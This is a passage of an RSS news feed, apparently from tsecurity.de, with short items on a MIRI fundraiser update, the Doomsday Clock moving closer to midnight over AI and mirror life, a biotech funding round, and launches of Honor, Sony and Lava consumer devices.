<content:encoded><![CDATA[<p>Update: Our fundraiser has concluded. Many thanks to all our generous supporters for helping us raise just over $1.6M and secure all available matching funds! MIRI is running its first fundraiser in six years, targeting $6M. The first $1.6M raised will be matched 1:1 via an SFF grant. Fundraiser ends at midnight on Dec 31, […]</p>
<p>The post <a rel="nofollow" href="https://intelligence.org/2025/12/01/miris-2025-fundraiser/">MIRI’s 2025 Fundraiser</a> appeared first on <a rel="nofollow" href="https://intelligence.org/">Machine Intelligence Research Institute</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA['Doomsday Clock' ticks 4 seconds closer to midnight as unregulated AI and 'mirror life' threaten humanity]]></title>
<description><![CDATA[The Bulletin of the Atomic Scientists now says humanity is a metaphorical 85 seconds to global disaster.]]></description>
<link>https://tsecurity.de/de/3365171/ai-nachrichten/doomsday-clock-ticks-4-seconds-closer-to-midnight-as-unregulated-ai-and-mirror-life-threaten-humanity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3365171/ai-nachrichten/doomsday-clock-ticks-4-seconds-closer-to-midnight-as-unregulated-ai-and-mirror-life-threaten-humanity/</guid>
<pubDate>Fri, 20 Mar 2026 04:28:49 +0100</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Bulletin of the Atomic Scientists now says humanity is a metaphorical 85 seconds to global disaster.]]></content:encoded>
</item>
<item>
<title><![CDATA[AusperBio Raises $63 Million in Series B2 Financing]]></title>
<description><![CDATA[AusperBio Therapeutics, Inc. and Ausper Biopharma Co., Ltd. (collectively AusperBio), a privately held clinical-stage biotechnology company dedicated to advancing targeted oligonucleotide therapies to achieve a functional cure for chronic hepatitis B (CHB), today announced the closing of its $63 ...]]></description>
<link>https://tsecurity.de/de/3364956/it-nachrichten/ausperbio-raises-63-million-in-series-b2-financing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3364956/it-nachrichten/ausperbio-raises-63-million-in-series-b2-financing/</guid>
<pubDate>Fri, 20 Mar 2026 04:25:44 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[AusperBio Therapeutics, Inc. and Ausper Biopharma Co., Ltd. (collectively AusperBio), a privately held clinical-stage biotechnology company dedicated to advancing targeted oligonucleotide therapies to achieve a functional cure for chronic hepatitis B (CHB), today announced the closing of its $63 million Series B2 financing. The financing was strongly supported by the company’s existing syndicate of investors, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor X6d Launched With 50-Megapixel Camera, 5,260mAh Battery: Price, Features]]></title>
<description><![CDATA[Honor has launched the budget 5G Honor X6d quietly in the UAE. Similar to the Honor Play 60A, it features a 6.75-inch HD+ LCD display, MediaTek Dimensity 6300 chipset, 4GB RAM, and 256GB storage. It is priced at AED 509 (roughly Rs. 12,600) and comes in Midnight Black and Ocean Cyan. The phone ha...]]></description>
<link>https://tsecurity.de/de/3364877/it-nachrichten/honor-x6d-launched-with-50-megapixel-camera-5260mah-battery-price-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3364877/it-nachrichten/honor-x6d-launched-with-50-megapixel-camera-5260mah-battery-price-features/</guid>
<pubDate>Fri, 20 Mar 2026 04:24:50 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Honor has launched the budget 5G Honor X6d quietly in the UAE. Similar to the Honor Play 60A, it features a 6.75-inch HD+ LCD display, MediaTek Dimensity 6300 chipset, 4GB RAM, and 256GB storage. It is priced at AED 509 (roughly Rs. 12,600) and comes in Midnight Black and Ocean Cyan. The phone has a 50-megapixel rear camera, 5-megapixel selfie camera, 5,260mAh battery...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sony WH-1000XM6 Now Available in Sand Pink Colour Variant in India: Price, Availability, Features]]></title>
<description><![CDATA[Sony launched the WH-1000XM6 in a new Sand Pink colour variant in India on Friday. Priced at Rs. 39,990, it joins Black, Platinum Silver, and Midnight Blue options introduced in September 2025. The headphones are available through Sony Centre stores, Croma, Reliance outlets, ShopatSC.com, and Ama...]]></description>
<link>https://tsecurity.de/de/3364819/it-nachrichten/sony-wh-1000xm6-now-available-in-sand-pink-colour-variant-in-india-price-availability-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3364819/it-nachrichten/sony-wh-1000xm6-now-available-in-sand-pink-colour-variant-in-india-price-availability-features/</guid>
<pubDate>Fri, 20 Mar 2026 04:24:11 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sony launched the WH-1000XM6 in a new Sand Pink colour variant in India on Friday. Priced at Rs. 39,990, it joins Black, Platinum Silver, and Midnight Blue options introduced in September 2025. The headphones are available through Sony Centre stores, Croma, Reliance outlets, ShopatSC.com, and Amazon. The WH-1000XM6 features 30mm drivers, QN3 noise-cancelling processor...]]></content:encoded>
</item>
<item>
<title><![CDATA[Lava Bold 2 5G Launched in India With 5,000mAh Battery, 50-Megapixel Camera: Price, Specifications]]></title>
<description><![CDATA[Lava Bold 2 5G has been launched in India by the Noida-based tech firm as the latest model in its Bold series. The smartphone is scheduled to go on sale in the country exclusively via Amazon on March 19. It will be available for purchase in Feather White and Midnight Black colour options. The han...]]></description>
<link>https://tsecurity.de/de/3363981/it-nachrichten/lava-bold-2-5g-launched-in-india-with-5000mah-battery-50-megapixel-camera-price-specifications/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3363981/it-nachrichten/lava-bold-2-5g-launched-in-india-with-5000mah-battery-50-megapixel-camera-price-specifications/</guid>
<pubDate>Fri, 20 Mar 2026 04:13:02 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lava Bold 2 5G has been launched in India by the Noida-based tech firm as the latest model in its Bold series. The smartphone is scheduled to go on sale in the country exclusively via Amazon on March 19. It will be available for purchase in Feather White and Midnight Black colour options. The handset is powered by a MediaTek Dimensity 7000-series chipset, along with 6...]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,13ms -->